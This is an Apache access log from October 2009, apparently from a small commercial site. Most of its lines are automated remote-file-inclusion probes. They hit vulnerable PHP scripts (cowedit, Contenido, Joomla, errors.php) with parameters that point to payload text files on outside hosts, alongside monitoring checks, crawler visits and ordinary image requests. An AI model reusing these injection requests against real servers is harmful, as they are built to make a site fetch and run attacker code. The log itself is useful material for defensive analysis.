174.143.3.188 - - [13/Oct/2009:03:03:19 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [13/Oct/2009:03:03:19 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [13/Oct/2009:03:03:19 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
121.124.127.164 - - [13/Oct/2009:03:03:26 -0400] "GET /logs/error_log.Q109090500%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:03:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.185.129.36 - - [13/Oct/2009:03:05:45 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:45 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:45 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:46 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:46 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:46 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:47 -0400] "GET /logs/access_log.Q109081500%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:47 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:47 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:03:05:50 -0400] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:52 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:52 -0400] "GET /logs/access_log.Q109081500%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:05:52 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:05:53 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:05:53 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:05:53 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:03:05:56 -0400] "GET /?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:03:05:56 -0400] "GET /logs/error_log.Q109090500%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:03:05:56 -0400] "GET /logs/access_log.Q109051100%20%20/?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:03:05:56 -0400] "GET /logs/?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:06:00 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:06:00 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:06:00 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:05 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:05 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:05 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:07 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:07 -0400] "GET /logs/access_log.Q109081500%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:07 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:18 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:18 -0400] "GET /logs/access_log.Q109081500%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:18 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:06:23 -0400] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:03:06:25 -0400] "GET /?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:03:06:25 -0400] "GET /logs/access_log.Q109051100%20%20/?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:03:06:25 -0400] "GET /logs/?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:06:26 -0400] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:26 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:26 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:06:26 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:07:56 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:07:56 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:07:56 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:04 -0400] "GET //error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:08 -0400] "GET /logs//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:08:08 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:08:08 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:08:08 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:08 -0400] "GET /logs/access_log.Q109051200%20%20//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:14 -0400] "GET /logs/access_log.Q109081600%20%20//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:16 -0400] "GET /logs//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:16 -0400] "GET /logs/access_log.Q109051200//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:16 -0400] "GET //error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:08:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [13/Oct/2009:03:08:33 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:08:33 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:08:36 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:08:43 -0400] "GET /logs/access_log.Q109081600//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.55.105.235 - - [13/Oct/2009:03:09:05 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.235 - - [13/Oct/2009:03:09:05 -0400] "GET /logs/access_log.Q109052800 HTTP/1.1" 200 4403369 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
203.185.129.36 - - [13/Oct/2009:03:09:11 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:09:11 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:09:11 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:09:24 -0400] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:03:10:01 -0400] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:03:10:01 -0400] "GET /logs/access_log.Q109092200%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:03:10:01 -0400] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:03:10:57 -0400] "GET /logs/error_log.Q109092300%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:11:11 -0400] "GET /logs//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:11:11 -0400] "GET //error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:11:11 -0400] "GET /logs/access_log.Q109081600//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:11:28 -0400] "GET /logs/access_log.Q109051500//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:11:37 -0400] "GET /logs/access_log.Q109081600//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:11:37 -0400] "GET //error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:03:11:39 -0400] "GET /logs//error.php?dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:11:44 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:11:44 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:11:44 -0400] "GET /logs/access_log.Q109081500/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:11:46 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:11:46 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:11:46 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:12:38 -0400] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:13:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.229.58.122 - - [13/Oct/2009:03:13:54 -0400] "GET //include/mail.inc.php?skin_board_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:13:57 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:03:14:15 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.143.3.188 - - [13/Oct/2009:03:14:15 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
174.143.3.188 - - [13/Oct/2009:03:14:15 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [13/Oct/2009:03:14:15 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
79.118.8.82 - - [13/Oct/2009:03:15:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:03:15:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:03:16:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:03:16:02 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:03:16:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:03:16:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
218.234.21.178 - - [13/Oct/2009:03:17:00 -0400] "GET /errors.php?error=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:03:17:00 -0400] "GET /logs/errors.php?error=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:03:17:00 -0400] "GET /logs/access_log.Q109092200/errors.php?error=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:03:17:11 -0400] "GET /logs/errors.php?error=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:03:17:11 -0400] "GET /errors.php?error=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:03:17:11 -0400] "GET /logs/access_log.Q109092200/errors.php?error=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.200.116.71 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/items/0032463_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.72 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/items/0032464_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.70 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/items/0032462_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.13 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/items/2000107_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.130 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/prev.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.132 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/cat_link.gif HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
207.200.116.74 - - [13/Oct/2009:03:17:38 -0400] "HEAD /images/items/0032475_THUMB.JPG HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
